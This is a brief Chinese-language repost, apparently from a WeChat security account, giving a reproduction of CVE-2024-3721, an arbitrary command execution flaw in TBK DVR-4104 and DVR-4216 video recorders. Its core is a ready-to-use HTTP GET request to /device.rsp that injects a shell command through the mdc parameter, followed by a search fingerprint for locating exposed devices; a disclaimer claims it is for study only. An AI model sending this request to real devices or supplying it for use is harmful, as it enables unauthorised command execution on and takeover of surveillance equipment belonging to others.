TBK DVR硬盘录像机 任意命令执行漏洞 CVE-2024-3721

渗透技巧 5个月前 admin
185 0 0

漏洞名称

TBK DVR硬盘录像机 任意命令执行漏洞 CVE-2024-3721


漏洞复现

1、替换需要执行的命令,发送请求

GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=ls HTTP/1.1Cookie: uid=xxxHost: 1.1.1.1


搜索指纹

“Location: /login.rsp”


利用条件

TBK DVR-4104

TBK DVR-4216

TBK DVR硬盘录像机 任意命令执行漏洞 CVE-2024-3721


免责声明



本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。


长按下方二维码,关注巨黑科,学习漏洞信息!

原文始发于微信公众号(巨黑科):TBK DVR硬盘录像机 任意命令执行漏洞 CVE-2024-3721

版权声明:admin 发表于 2024年5月11日 上午8:01。
转载请注明:TBK DVR硬盘录像机 任意命令执行漏洞 CVE-2024-3721 | CTF导航

相关文章